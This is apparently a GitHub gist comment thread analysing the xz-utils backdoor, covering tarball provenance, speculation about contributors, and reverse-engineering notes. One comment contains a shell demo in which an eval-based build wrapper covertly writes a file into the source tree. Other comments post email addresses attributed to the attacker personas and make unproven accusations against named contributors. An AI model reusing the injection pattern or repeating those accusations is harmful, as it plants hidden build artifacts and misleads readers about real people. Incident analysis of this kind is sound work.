Could Github add a check if the tarballs gets created with the code hosted on the platform ?

Please read the "Design" section in the FAQ where this topic is explained.

(And note that the tiny part of the backdoor that was only in the release tarballs could as well have been in git like the rest of the backdoor - everything in git was also under control of the attacker.)

@rifkidocs
Copy link

just want to leave a trace here

@ZacharyDK
Copy link

How would one even begin to try and break apart the malicious binary? Recommended tool suite?

@AdrianBunk
Copy link

How would one even begin to try and break apart the malicious binary? Recommended tool suite?

Read the links under "Analysis of the payload", where people discuss the payload and how they have analyzed it.

@anzz1
Copy link

anzz1 commented Apr 5, 2024

I really hope that the wakeup call people take from this is that the "move fast and break things" mentality should not apply to kernel nor core utilities. Stability and safety is much more important than new shiny features especially if Linux is to be the stable foundation for server and embedded applications running critical code in the future too. I really hope any people bullying maintainers to accept patches and new features to already perfectly functioning tools will be called out more often. If you desperately want a new feature, fork it and make your own.

I hope that people would understand to look back into what Linux was and what the core idea of it is, which I would describe as a collection of simple utilities (GNU) and the kernel to support them. Not anything else, everything that is complex, hard or time-consuming to audit, new feature that is controversial, should not be included in either the kernel, core utilities or major distros as default. You are not supposed to create these large monoliths like systemd which span their tentacles to the entire system and introduce not only a complex large codebase addition but also a single point of failure.

I also hope that the reflection from this isn't that we need more idiotic "mitigation" security features like AppArmor, position-independent-executables, stack canaries/protectors and such other band-aid "fixes" which create additional complexity that does not only hurt performance but is also fertile ground for new security holes and bugs to fester.

The only sane and safe way is to make the kernel and core utilities simple and lean so they are easy to audit, lift your foot from the pedal a bit so everything can be checked at least with several sets of eyes before moving forward. There is no need for any "mitigations" when the code itself is safe.

Also the whole community needs to not succumb to any person's or group's vanity who push hard to get their personal pet projects merged into the foundation that everyone uses. As much software as possible should be built on top of Linux, as packages which can be installed like it has always been, not into Linux either in the kernel or as kernel patches included by default in major distributions or packages installed by default. The more "blank slate" a base Linux installation is by default, the better off is everyone is. This is especially true for distributions which are focused on serious use like Debian. Most people and in turn infrastructure they create use major distributions as a base, so the decisions made by major distributions also have a great impact, so not only must the kernel team be vigilant.

If you look at the kernel mailing list, Torvalds has been active in fighting against the tide of many people trying to push all kinds of bullshit into the kernel source tree. But the major distributions to my (limited) knowledge doesn't have such a strong gatekeeper and all the distros are getting increasingly bloated and include more and more unnecessary features by the day. Also Torvalds will eventually retire, what will happen then, who will fight against the tide? That not also makes me scared for the future of Linux, but also shows that it's not a good idea to rely on a single gatekeeper to keep all the bullshit out. I mean over a decade ago, there was a serious push to move the linux kernel to use C++, which Torvalds promptly stopped in its tracks, thank god. Where would we be without people pushing back and wanting to contemplate first? We need more of those people as maintainers in the OSS community, the critical thinkers and slow and steady types.

How could the OSS community at large have the reflection when it comes to critical foundations that everything needs to be handled with proper care, which means taking your time, and not every feature needs to make it in just because it's new and shiny? The problem at large is that the group who want "feature X" to be added are usually loud and obnoxious and push hard while most people who think "is this really necessary" will not either out of politeness say anything or do not care enough. Then even when maintainers think so, it's easy to have the psychological effect of "oh, this must then be what people really need" and get bullied to merge a new feature in without proper checks and balances. Rinse and repeat a hundred times and suddenly the distribution got much more bloated and harder to audit since a hundred new features were added each of which some person might just maybe need sometime has been added as default.

TL;DR; Everyone who is a developer in any critical software work like kernel, core utilities, major distributions of Linux, etc., take your time. The world will not end if a new feature doesn't get added in tomorrow. It just might though if you add something in a hurry. You don't owe anyone anything, especially not someone bugging you to immediately add a "feature X" because some small subset of users might want to use it.

@Z-nonymous
Copy link

Z-nonymous commented Apr 5, 2024

Wait until snaps and flatpaks are properly exploited. 😂

@Aqa-Ib
Copy link

Aqa-Ib commented Apr 5, 2024

Well said anzz1. You even can extrapolate what you said to everything that human society do. It is practically impossible to stop this crazy development that we have as a whole. However, those individuals who make things carefully can be of great value for our future.

@Daniel15
Copy link

Daniel15 commented Apr 5, 2024

Could Github add a check if the tarballs gets created with the code hosted on the platform ?

GitHub already has built-in support for generating tarballs based on a tag (for example, https://github.com/Daniel15/prometheus-net.SystemMetrics/archive/refs/tags/v3.1.0.tar.gz). This is guaranteed to match the code in source control.

The issue is that sometimes the tarballs legitimately differ from the repo contents, particularly if the project uses automake. However, this is not ideal, and projects should strive to have reproducible builds, meaning the code to build the project is exactly the same as the code checked in to source control, and building the code from source always produces the same binary (so anyone can build the project from source to verify that a precompiled executable was built from the same source code, as it'll be exactly identical). One of the more common issues with achieving reproducible builds is timestamps, for example if the current build time is embedded in the executable.

Having said that, as others have mentioned, that wouldn't have helped here. The attacker was in full control of the source control repo, and could have just put everything in there rather than just in the tarball.

@Daniel15
Copy link

Daniel15 commented Apr 5, 2024

Network engineer here, so I do not have the know-how to talk about the code. But I have seen this idea of "just move to IPv6, everything will be solved there!" too many times not to reply.

@bogd IPv6 does help though. Most good hosting providers will give you at least a /64 range per server for IPv6 (the great ones will give you a /56), and you can run your SSH server on a random IP in the middle of the range. Just stick the IP in an internal-only DNS zone and don't expose the DNS record publicly. That's far less likely to be found during a scan, compared to IPv4 where the entire public IPv4 range can be scanned in 5-15 minutes (https://github.com/robertdavidgraham/masscan).

Sure, it's security through obscurity and thus isn't a proper security measure, but I've been running a honeypot server in one of my /64 ranges for a few years and so far nobody has hit it. IPv6 traffic to some of my sites is around 45% of total traffic, so people are using IPv6 otherwise 🙂

@ormaaj
Copy link

ormaaj commented Apr 5, 2024

I really hope that the wakeup call people take from this is that the "move fast and break things" mentality should not apply to kernel nor core utilities.

This was caught as early as it was thanks entirely to the abundance of people testing new release code in a wide variety of environments. That is made possible by downstream distributors that integrate test packages into their systems so they are easily available. Testers of upstream prerelease code had no opportunity to find this.

This is the system working exactly as it should.

@fatience
Copy link

fatience commented Apr 6, 2024

Neustradamus's behaviour is indeed suspicious.
https://news.ycombinator.com/item?id=39868682

He seems to push the "plus version" of SCRAM-SHA(3)-512 everywhere, with a lack of motive or proper argumentation other than "they use it as well" (projects he convinced beforehand).

https://bugzilla.mozilla.org/show_bug.cgi?id=1577688 - This seems to be a common response when people want to implement it

Someone more experienced with this should definitely take a look.

@bogd
Copy link

bogd commented Apr 6, 2024

@bogd IPv6 does help though.

No arguments there - it does help, it's just not the panacea that some people think it is :)

Most good hosting providers will give you at least a /64 range per server for IPv6 (the great ones will give you a /56)

There's a very nice conversation here about how allocating 1 trillion times the entire IPv4 address space for a single server is "a good idea" (TM), and I am old enough to remember the days when we allocated an IPv4 /8 for a single network, because "the address space is so large, it is practically infinite". But as I was saying, I do not want to sidetrack this conversation and go into other topics - the original topic is far too important.

Sure, it's security through obscurity and thus isn't a proper security measure

That was my entire original point. Maybe that, plus what others have added:

  • IPv6 would not have protected against an application-level backdoor
  • this attack does not look like something that would be used against random targets, discovered during a "routine" scan. Looks more like something one would save to use against extremely high-value, known targets. I know, assumption, but... not an illogical one.

@AdrianBunk
Copy link

He seems to push the "plus version" of SCRAM-SHA(3)-512 everywhere, with a lack of motive or proper argumentation other than "they use it as well" (projects he convinced beforehand).

You should read the links provided by this person, these are proposals for upcoming internet standards.

https://bugzilla.mozilla.org/show_bug.cgi?id=1577688 - This seems to be a common response when people want to implement it

Mozilla accepted an implementation from someone else that implemented a major part of the original request, this is a strong indication that the request made sense.

please do not respond to closed bugs asking for additional features. Please file a separate bug for new features.

That's a very common mistake, nothing suspicious about that.

behaviour is indeed suspicious.

It can be really harmful when people who clearly have no experience interacting with users in open source projects are making such bold accusations, it happens far too often that a brainless internet mob drives innocent people into suicide.

@thesamesam
Copy link
Author

thesamesam commented Apr 6, 2024

I am familiar with that person (I don't know him) and my take has always been that he's enthusiastic but ends up irritating a lot of people (me included) because of how he goes about things. I don't think he's malicious, just ends up causing hassle for FOSS maintainers. This situation is cause to pause and reflect on behaviour but I don't think people should be chasing after him.

@Chestnuts4
Copy link

Chestnuts4 commented Apr 6, 2024

Sorry, I want to know how can I get xz.5.6.1.tar.gz, then I can diff it as same as you

git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4

@Chestnuts4
Copy link

xz-5.6.1

which place can I download former build-to-host.md, I get xz-5.6.1.tar.gz from github

@thesamesam
Copy link
Author

thesamesam commented Apr 6, 2024

@Chestnuts4 Hi. Are you looking for the safe/original/non-tampered version of build-to-host.m4? You can get this from gnulib. It might be in /usr/share/aclocal on your system if you have recent gettext installed too.

@Chestnuts4
Copy link

@thesamesam thanks for you reply, I got original build-to-host.m4 from github, and success diff it

@ivq
Copy link

ivq commented Apr 7, 2024

I sent the initial versions of the RISC-V filter to Lasse last year and quit the development afterwards, that's why I was
acknowledged in the library code. If only I had CCed the mailing list.

Why push the RISC-V filter and new version of lzma?
(1) Bouffalo Lab has a series of RISC-V SoCs, See Products
(2) They are using lzma Python module in their flash tool to generate OTA images, See BLDevCube using lzma.
(3) The lzma BCJ filters can improve compression ratio
(4) Compression ratio matters, saved flash size is profit
(5) If Python has upstream support for RISC-V filters, they do not need to bother maintaining binary shit like
the used genromfs tool, See BLDevCube calling bundled genromfs binary
(6) They may also use lzma in other languages, thus the push on xz-embedded and Rust binding library.

About the name
I chose Chien Wong simply because I like it and dislike Pinyin. Pinyin does not suggest correct pronunciation
to non-mandarin speakers.

About the ongoing CPython PR binary test file
The reason I chose them is easy: why not use upstream test vectors if upstream has them?
However, it turns out that the choice was arbitrary and wrong.

My advice is to write to Bouffalo Lab for confirmation.

I have updated my profile to show organizations. I'd hide it any time if I like.

He also committed a several changes to Wireshark in 2022 and 2023, it looks like several commits for wireshark's wifi 802.11 handling, to meet the spec more accurately, to add a new capability to it for ipv6, and to fix a bug. I'm not a 802.11 expert, but the code doesn't look unsafe at a cursory glance for the most part.

There's some rework in this commit to address A-MSDU dissecting that is addressing the padding for the last packet. This seems plausible to me, but again, I don't know enough about 802.11.

Thank you for reviewing the commits I've made!

In my personal opinion,based on the current evidence of long-term lurking and preparation,it can be inferred that this individual has motives and plans,thinks clearly and cautiously,and the information related to their background and daily routine may be distorted or manipulated。Any records left behind could potentially be intentional。

不要见着风,是得雨。

@redcode
Copy link

redcode commented Apr 7, 2024

Thank you very much for clarifying the situation @ivq. Can you tell us anything about Jia Tan? I mean, did you talk in Chinese or can you deduce anything about him based on private conversation or emails if there were any?

From what you say, I understand that you had no direct communication with Jia Tan at any time.

@RufusExE
Copy link

RufusExE commented Apr 8, 2024

不要见着风,是得雨。

只是从渗透的角度去看的,所有可能都分析过,首先,明明英文名更容易让人难定位和分析,实质他选择推动事情进展的几个帮凶就是英文名角色,但是选了一个明显符合政治取向并更好定位群体的人群,并且还留了在名字中间使用了一个拼音级的中西结合的马脚(这个操作很诡异,专业和不专业混杂在一起),然后还有一个看似失误的代理IP跳转,从手法角度,他可以伪装一次,就可以伪装多次,从技术角度,他的技术水平应该没啥争议的,我感觉还是当做一个极其专业的个人或者团队的演练或者尝试会比较好

@ivq
Copy link

ivq commented Apr 8, 2024

Thank you very much for clarifying the situation @ivq. Can you tell us anything about Jia Tan? I mean, did you talk in Chinese or can you deduce anything about him based on private conversation or emails if there were any?

From what you say, I understand that you had no direct communication with Jia Tan at any time.

No, we never talked in Chinese. There were only a few e-mails then and I did not find any useful information regarding social engineering.

@ramizpolic
Copy link

This seems to me more like a team rather than individual effort.

@schkwve
Copy link

schkwve commented Apr 8, 2024

I've been out of this discussion for a while; has anything interesting been said in this discussion (that has not been mentioned in the gist)?

@roccotanica1234
Copy link

I don't know if it's relevant, but it appears that Hans Jansen has an account on proton.me (hansjansen162@proton.me), with the Outlook address (hansjansen162@outlook.com) set up as the recovery email.

@AdrianBunk
Copy link

@thesamesam Regarding "Solar Designer suggested this may have caused", this might be disproved by 5.6.0 being released and in Debian before the MR:
https://tracker.debian.org/pkg/xz-utils
systemd/systemd#31550

The Debian Import Freeze for Ubuntu LTS on February 29 is something I would consider more likely for the timing of the 5.6.0 release:
https://discourse.ubuntu.com/t/noble-numbat-release-schedule/35649

The next chance of getting the backdoor into an Ubuntu LTS would have been 2026, releasing in February for getting millions of backdoored production machines around the world in May would be a logical plan.

@thesamesam
Copy link
Author

@AdrianBunk Ah, thanks! I remember being subscribed to the systemd PR before all of this and I think that meant I assumed it was older than it was, so I figured the timelines made sense. I'll make those corrections in a minute.

@thesamesam
Copy link
Author

@AdrianBunk Can you check out what I've written now? There's some nuance in it. I think you're right that this makes the theory rather unlikely, although it's interesting that it was first brought up in January.

@AdrianBunk
Copy link

@thesamesam Some thoughts on that:

The "a systemd developer suggested extending the approach to compression libraries" comment was 2 days after the release of 5.6.0, more relevant would be systemd/systemd#31131 (comment)

The timing of 5.6.0 is a good fit for getting into Ubuntu LTS, and that could explain the timing no matter what happened at systemd.

Lennart and Andres are both working at Microsoft, even the reverse direction that some government agency had advance knowledge of the planned backdoor and nudged people in the right direction cannot be ruled out.

@thesamesam
Copy link
Author

thesamesam commented Apr 8, 2024

From my own participation in discussions on IRC, the plan was absolutely to be in the next Ubuntu LTS, btw. Jia pushed for an accelerated release schedule to make it in.

@thesamesam
Copy link
Author

thesamesam commented Apr 8, 2024

@AdrianBunk Many thanks again. I'll try to find somewhere to mention the Ubuntu LTS thing, given it was absolutely true - even if I can't speak to motive. I'd prefer to mention it outside of the systemd thing given that part is getting a bit big and it's not strictly relevant to that, but I am happy to hear dissenting opinions.

@the-lne
Copy link

the-lne commented Apr 9, 2024

Obviously someone would look into performance inconsistencies on an opensource tool of all things. That's like selling a sick dog to a veterinarian. What we did is catch the lowest hanging fruit. There probably are more out there in even more critical tools that we will never know about because who doesn't have something to gain from that. This isn't news, it's writing on the wall and a warning to be a little less trustful. Imagine if he actually knew what he was doing, or what a team of sponsored professionals could do. Hopefully future commits are held to a higher standard on critical applications.

@AdrianBunk
Copy link

@thesamesam Regarding "Checking other projects for similar injection mechanisms", Debian has an online search engine that provides literal and regex searches over up-to-date sources of the 38k packages in Debian unstable like:
https://codesearch.debian.net/search?q=grep+-aErls&literal=1
https://codesearch.debian.net/search?q=Automake+1.10a&literal=1

I checked interesting strings from the manipulated build-to-host.m4, and there was nothing that looked suspicious to me.

@felipec
Copy link

felipec commented Apr 10, 2024

This one is really complete: The xz attack shell script, it shouldn't be "other".

@christoofar
Copy link

christoofar commented Apr 10, 2024

I sent the initial versions of the RISC-V filter to Lasse last year and quit the development afterwards, that's why I was acknowledged in the library code. If only I had CCed the mailing list.

Why push the RISC-V filter and new version of lzma? (1) Bouffalo Lab has a series of RISC-V SoCs, See Products (2) They are using lzma Python module in their flash tool to generate OTA images, See BLDevCube using lzma. (3) The lzma BCJ filters can improve compression ratio (4) Compression ratio matters, saved flash size is profit (5) If Python has upstream support for RISC-V filters, they do not need to bother maintaining binary shit like the used genromfs tool, See BLDevCube calling bundled genromfs binary (6) They may also use lzma in other languages, thus the push on xz-embedded and Rust binding library.

About the name I chose Chien Wong simply because I like it and dislike Pinyin. Pinyin does not suggest correct pronunciation to non-mandarin speakers.

About the ongoing CPython PR binary test file The reason I chose them is easy: why not use upstream test vectors if upstream has them? However, it turns out that the choice was arbitrary and wrong.

My advice is to write to Bouffalo Lab for confirmation.

I have updated my profile to show organizations. I'd hide it any time if I like.

He also committed a several changes to Wireshark in 2022 and 2023, it looks like several commits for wireshark's wifi 802.11 handling, to meet the spec more accurately, to add a new capability to it for ipv6, and to fix a bug. I'm not a 802.11 expert, but the code doesn't look unsafe at a cursory glance for the most part.
There's some rework in this commit to address A-MSDU dissecting that is addressing the padding for the last packet. This seems plausible to me, but again, I don't know enough about 802.11.

Thank you for reviewing the commits I've made!

In my personal opinion,based on the current evidence of long-term lurking and preparation,it can be inferred that this individual has motives and plans,thinks clearly and cautiously,and the information related to their background and daily routine may be distorted or manipulated。Any records left behind could potentially be intentional。

不要见着风,是得雨。

The filter flag changes made to xz have been run down (S/O to https://github.com/smx-smx/xzre for assembling the best puzzle piece reconstruct https://smx-smx.github.io/xzre/globals.html) allowing so many more people to jump into disassemblers to figure out this puzzle.

Note: People keep saying (wrongly) that sshd is compromised. There's always room for improvement in anything. sshd is not how this nasty thing gets on a machine. It does exploit both systemd and ld in concert so that when systemd launches a fork(), it grabs a hold of ld for its audit hook and reads through the rest of the load. From there it can replace any function in memory that it wants.

It's a hotloader delivery platform that can target any process in Linux. The entire memory of the computer is its oyster.

All that work you made hashing credit card digits info before storing them in db2? Who cares, liblzma.so if the creators want, can kick a new variant on to your host and read it.

The data types used to support the flags is how the backdoor finds a way to maintain state in memory and not be seen. The RISCV option added to lzma was done in the publicly visible code, and the refactor of lzma, to hide small adjustments that allow nasty structures like lzma_vdi but other data structures in lzma to be used to hold areas in memory, use x64 dasm against areas of the entire process space including everything systemd manages, copies out and replaces what should have been static code set to ro, it hijacks ld way earlier that thought (and it hijacks itself), so all the data structures in liblzma.so can be used to hold hard things to construct, like function tables scanning both the ABI and LD_AUDIT to verify its work, and push that into its own reserved areas and escape observation.

Why don't you show us some proofs @ivq that the changes you wanted into CPython would give you a performance boost? Did you verify that on your own testbed? How about you post your results, here.

image

So, that 5.6.0 to 5.6.1 update Jia Tan put out? RE effort exposed the loading/init pathway where the code is trying to erase what's probably an examine tool (my theory), which is another hotloaded side-car that they use locally to debug and keep track of the integration as they continue to layer more techniques to thwart analysis. How does that happen? Well, the crash from valgrind came from the microlzma function.

Talking out the ASM by hand the RE team learned that it was not nuking in its own stack area. It was trying to erase an adjacent stack area. Because liblzma.so can walk the ELF and the memory space to find the offsets for the calls it wants to use, this indicates that there's more than one build process:

  • The one we see in the distros
  • Another one baking the toxic .o injectors

A mismatch in feature flags running the build for the injectors is why Jia had to hustle, because Jia (who's really a whole team of people) did not know that valgrind is run before some OSS developers releases.

Full report on the top-level symbol differences between the .0 and .1 crc_64 injectors are here:
https://jiatanfunctions.tiiny.site/

@DaLynxx
Copy link

DaLynxx commented Apr 10, 2024

xz @ github is available again. https://github.com/tukaani-project

@christoofar
Copy link

christoofar commented Apr 10, 2024

Right now @ivq I don't believe your word salad without showing some RISCV proofs against a direct invocation of 5.6.0 or 5.6.1

Pull out your RISCV board and do a time test and post it here, then.

Anyway... both the encoder initter and decoder initter got this harmless looking adjustment that, in the decoder, is not used at all and is only meant by Lasse to report out completed results of decompression. But with the right compile options it survives being removed. Since the filter options themselves are a travel point every point in code, guess where the pointers to the backdoor go?

The harmless looking filter flags update are critical to activating the backdoor, there's so many data structures to hijack inside lzma; some so handy that simpler types without promoting them into pointers is not needed. You essentially have your own database.

Which is what lzma_vli probably will be promoted to someday in a server hotpatch, who the hell knows.

image

@DaLynxx
Copy link

DaLynxx commented Apr 10, 2024

Also https://xz.tukaani.org/xz-utils/ no longer responds. (affects link under chapter 'Background')

@christoofar
Copy link

christoofar commented Apr 10, 2024

Most HLL programmers are just gonna go "huh?" because they cannot understand the concept in their minds that when you leave an area of memory loaded with your porn stash without wiping it and just zero the pointer out, your porn history table still sits there in RAM.

Now Jia can read it.

There's still no idea how much is left to find. I'm reliving my Compaq Deskpro 8086 days which was the last time I wrote asm, I don't know a thing about x64 asm beyond just the register sizes and effects (and some of the original x86 opcodes), there is so much more to discover.

liblzma.so is both a nightmare, and a masterpiece of layered integration. And the thing is fucking evil.

Fucking. Evil.

P.P.S.: All the credit to everyone helping out on the re. I'm not a security huckster and shilling corps with CBT videos. I have done integrations of weird shit to normal shit my whole career, and pulling out and sussing through crashdumps, register readouts, logs and any other evidence I can get my hands on when I get stuck and have to produce the normie-version of events and developers are trying to throw shit over the wall back on to developers who have no control on their side of the fence have solid ammo to fire back with. "They broke our shit" is what gets me going.

When I'm coming for you with a diff report, run.

@christoofar
Copy link

christoofar commented Apr 10, 2024

Oh, cool bin trick from fiddling with game roms:

compact a bin (gz will do in many cases, not all but most). You can spot where data goes and where code goes when the compaction removes away all the 00 FF patterns left around for initializers. It only works for empties, but in corpland and especially in C++ there's monster data structures that compact to almost nothing.

In Jia Tan's case, the function delete reorders everything that survived, resulting in a byte slide that picks up well on the radar.

You already have a bindiff analyzer on your box. It's in emacs (the other malware you can get from the distros). It's a neat trick when a vendor sends something and I need a clue of how "big" their changes were, generally-speaking, they keep 9 layers of mis-management away from me and the other team actually doing the work, and to sense when they aren't talking but the bins they're walking indicate they're doing a refactor job on the inside.

Jia again:
image

@terokinnunen
Copy link

@Chestnuts4 Hi. Are you looking for the safe/original/non-tampered version of build-to-host.m4? You can get this from gnulib. It might be in /usr/share/aclocal on your system if you have recent gettext installed too.

Thanks, I was puzzled about this too for quite a while. Just an idea - pointer to legit upstream https://git.savannah.gnu.org/gitweb/?p=gnulib.git;a=blob;f=m4/build-to-host.m4;h=f466bdbd84abdf60e8305fa7adc12c74d7f05a8a;hb=HEAD would be helpful clarification here.
(Probably the TODO item "Explain dist tarballs" will cover this later (?), but until then, a quick pointer in Design section would clarify a lot.)

@christoofar
Copy link

christoofar commented Apr 10, 2024

🤔

Any particular reason Jia Tan why you nuked this whole area and in its place is the execution path that takes you to the backdoor?

image

image

@rybak
Copy link

rybak commented Apr 10, 2024

FYI, the malicious commits (the in-repository portion of the backdoor) were reverted: e93e13c (Remove the backdoor found in 5.6.0 and 5.6.1 (CVE-2024-3094)., 2024-04-08).

@thesamesam
Copy link
Author

I'll try respond to the above comments which need me to make changes later today. Thanks.

@roccotanica1234
Copy link

Jia Tan's account, associated to jiat0218@gmail.com on Twitter is: https://twitter.com/JiaT03868010 (I haven't find it mentioned anywhere)

@flybyray
Copy link

What is "this"? xz_wrap was recently changed by Lesse, but the changes are reasonable and do not introduce any new eval; the options are consistent with manpage recommendations. The Makefiles were recently changed for version and other reasons, not much to do with xz.

cmd_xzkern = cat $(real-prereqs) | sh $(srctree)/scripts/xz_wrap.sh > $@

ref: https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/tree/scripts/Makefile.lib?h=next-20240328#n528

which is quite different from all other compression tools.
Because it does not pipe directly into the xz tool. it uses an additional process sh in the hiarchy. sh provides additional insight via environment variables for child processes.
The whole thing has nothing to do with stripped down xz decompression code within the kernel.
The call goes into what is packaged in the kernel build environment for $XZ.

eval "$($XZ --robot --version)" || exit

ref: https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/tree/scripts/xz_wrap.sh?h=next-20240328#n36

When you follow @christoofar lookups you may notice that $XZ might work differently when it detects specific things.
$XZ for sure is linked to liblzma.so.

@Artoria2e5
Copy link

And my dear Ray, there’s already a NON-MALICIOUS EXPLANATION as to why an sh is used: it turns on the bcj flags.

@flybyray
Copy link

And my dear Ray, there’s already a NON-MALICIOUS EXPLANATION as to why an sh is used: it turns on the bcj flags.

Better safe than sorry. Ask yourself what a NON-*-EXPLANATION is worth. Especially an explanation which is at all wrong - shows just that supplier has no experience.

@Artoria2e5
Copy link

Artoria2e5 commented Apr 12, 2024

sh provides additional insight via environment variables for child processes.

It also does not, because the shell script in question does not export anything new to the environment. The shell only changes envp in three circumstances:

  • when a new variable is explicitly added to envp via "export" or "declare -x"
  • when a variable is explicitly de-exported, say by running declare +x
  • when an already-exported variable, such as PATH, is changed or unset

Otherwise every variable change stays local to the shell process.

The only additional "insight" is just the well-documented BCJ and lzma alignment parameters.

Maybe a doubt that is "at all wrong" also shows the doubter has no experience?

@paulfloyd
Copy link

paulfloyd commented Apr 12, 2024

Has anyone done any detailed examination of the exact cause of the Valgrind errors that Freund (and Fedora and maybe other distros) saw?

https://bugzilla.redhat.com/show_bug.cgi?id=2267598

I'm mainly curious about the strange stack addresses like 0x6 and 0x77AD31E59B84CFFF. The persons responsible did try to cover up by adding an option to turn off omit-frame-pointer. Does the exploit assume the use of the frame pointer, and if it isn't there gets the stack layout wrong and writes below the stack pointer? (Below literally means below as in address less than RSP, not from the inverted view of the grow-down stack. But not as far below as the stack guard). omit-frame-pointer may also be affecting Valgrind's stack walking.

@flybyray
Copy link

flybyray commented Apr 12, 2024

Maybe a doubt that is "at all wrong" also shows the doubter has no experience?

Polite as you are, you used " maybe". Politeness won't help you against a criminal hacker's ideas. The experiences of doubters are often worth more than those of so-called fact-checkers.

because the shell script in question does not export anything new to the environment

if you waited patiently after reading carefully until you really understood what you had read, without ignoring the meaning of the words, you could avoid misinterpretations and make fewer inference errors.
I wrote "insight via environment variables for CHILD processes". How dare are you that you then talk about "does not export anything new to the environment"? I wish you would rather fantasize about the similarity between eval and evil.

have you really understood only some of the attack patterns that have already been discussed here? because of course the attackers in a build process don't care about changing the environment! just think about how many places environment variables could appear in logs and the hide-and-seek game would end immediately. I would recommend to you, that you inspect some public build servers and their artifacts and detailed outputs of builds.

The trick is to leave artifacts in the right places as inconspicuously as possible during the build process.

But I'm not giving up on you yet. Let's start by making the bold printed a little clearer.
The following should only use the fragments highlighted in the leading comment as a sample. I didn't develop xz, so I'm replacing it with sh. I can't use the --robot --version arguments, but they are almost irrelevant.

# this is only pretext normally provided by the task to build the kernel
TEMPDIR="$(mktemp -du)"
mkdir -p $TEMPDIR/Artoria2e5/mykernel/scripts
mkdir -p $TEMPDIR/Artoria2e5/mykernel/prereqs
srctree=$TEMPDIR/Artoria2e5/mykernel
pre_reqs="$TEMPDIR/Artoria2e5/mykernel/prereqs/a.txt"
XZ=sh
export XZ
echo please cleanup $TEMPDIR when you are done
cat >"$TEMPDIR/Artoria2e5/mykernel/prereqs/a.txt"<<'EOF'
lorem ipsum and some intersting pointers to CANCER
EOF
cat >"$TEMPDIR/Artoria2e5/mykernel/scripts/xz_wrap.sh"<<'EOF'
eval "$($XZ -c 'TARGET_DIR='$(dirname ${BASH_SOURCE[0]})/..';echo STEVE_S_LATE_REVENGE_FOR_LINUX="$(grep -Po '\''pointers to \K\S+'\'')";echo $'\''X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'\''> ${TARGET_DIR}/blob.txt')" || exit
#this is just to make it easier to understand the above XZ command would be able to produce this too
echo a $STEVE_S_LATE_REVENGE_FOR_LINUX that attaches itself in an intellectual property sense to everything it touches
EOF

# now we are going to "build the kernel" - show casing just relevant maybe malicious part
# original 'cmd_xzkern = cat $(real-prereqs) | sh $(srctree)/scripts/xz_wrap.sh > $@' 
cat ${pre_reqs} | sh ${srctree}/scripts/xz_wrap.sh > a_message_to_the_linux_people.txt
# finished nothing special to see

# verify that the build context was modified
cat a_message_to_the_linux_people.txt
find $TEMPDIR -type f -name blob.txt -exec cat {} \;

# cleanup
rm -rvf $TEMPDIR

unfortunately, based on your reading comprehension, i have to assume that you still won't understand. but maybe there are a few others who can help you further.
The verify step would show you

  • 'cat a_message_to_the_linux_people.txt'
a CANCER that attaches itself in an intellectual property sense to everything it touches
  • 'find $TEMPDIR -type f -name blob.txt -exec cat {} ;' # a nice blob placed into srctree
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

i have done my duty and shown good will

@dnorthup-ums
Copy link

Has anyone done any detailed examination of the exact cause of the Valgrind errors that Freund (and Fedora and maybe other distros) saw?

https://bugzilla.redhat.com/show_bug.cgi?id=2267598

I'm mainly curious about the strange stack addresses like 0x6 and 0x77AD31E59B84CFFF. The persons responsible did try to cover up by adding an option to turn off omit-frame-pointer. Does the exploit assume the use of the frame pointer, and if it isn't there gets the stack layout wrong and writes below the stack pointer? (Below literally means below as in address less than RSP, not from the inverted view of the grow-down stack. But not as far below as the stack guard). omit-frame-pointer may also be affecting Valgrind's stack walking.

@paulfloyd The 0x6 address is pretty easy, that's evidence of something being compiled with the -fPIE compile time flag set, something the build scripts of xz-utils do not do (including the compromised ones). As for the 64-bit 0x77... or 0xDD2A.... addresses, it looks to me like something is trying to be clever and take advantage of the "hole" between typical user space and kernel space when injecting the payload via ifunc. I suspect if you look at one of the disassembly attempts of the exploit you'll get more insight into what is going on there and why those are important (as noted, I strongly suspect they are).

@AdrianBunk
Copy link

Maybe a doubt that is "at all wrong" also shows the doubter has no experience?

Polite as you are, you used " maybe". Politeness won't help you against a criminal hacker's ideas. The experiences of doubters are often worth more than those of so-called fact-checkers.

if you waited patiently after reading carefully until you really understood what you had read, without ignoring the meaning of the words, you could avoid misinterpretations and make fewer inference errors.

@flybyray Conspiracy theories and insults from people like you are not helpful.

A huge amount of people all over the world who are highly competent in this area have been working on dissecting this exploit for 2 weeks, anyone who claims to have found something new on the technical side here in this discussion only demonstrates being clueless.

Please stop it.

@AdrianBunk
Copy link

AdrianBunk commented Apr 12, 2024

The 0x6 address is pretty easy, that's evidence of something being compiled with the -fPIE compile time flag set, something the build scripts of xz-utils do not do (including the compromised ones).

All major distributions (including Debian) changed their compiler to default to PIE several years ago for ASLR.

@christoofar
Copy link

christoofar commented Apr 13, 2024

Has anyone done any detailed examination of the exact cause of the Valgrind errors that Freund (and Fedora and maybe other distros) saw?

https://bugzilla.redhat.com/show_bug.cgi?id=2267598

I'm mainly curious about the strange stack addresses like 0x6 and 0x77AD31E59B84CFFF. The persons responsible did try to cover up by adding an option to turn off omit-frame-pointer. Does the exploit assume the use of the frame pointer, and if it isn't there gets the stack layout wrong and writes below the stack pointer? (Below literally means below as in address less than RSP, not from the inverted view of the grow-down stack. But not as far below as the stack guard). omit-frame-pointer may also be affecting Valgrind's stack walking.

When we talked it out, the function that was doing this nuke (microlzma is what Jia Tan wants to raise during init), did not supply a size when it entered the loop to start writing 0x00 into a stack area.

This function, lzma_stream_header_encodb, is not in the 5.6.1 .o release, it only appears in the 5.6.0; hence the theory that a mistake in the feature flags for the build did not completely strip out the setup for a debug/examine tool (which would have reported out the progress of the locator and possibly also brought in a more comprehensive debug/examine tool as an option). My guess is that it's not a mistake in the offsets calculations (there is a whole DASM library inside the malware), but a way to quickly patch the obfuscations in while still making sure that the hotloading core code stays functional.

Jan Tan needed someway to know that he landed on all the jump calls needed to patch libcrypto.

Further: The final 5.6.1 has an insert in the ELF table for a note area that is moving all the bytes down 0x26, and throwing the asm dumps into diff shows a heavy amount of offset changes in microlzma, the gateway to the backdoor.

@christoofar
Copy link

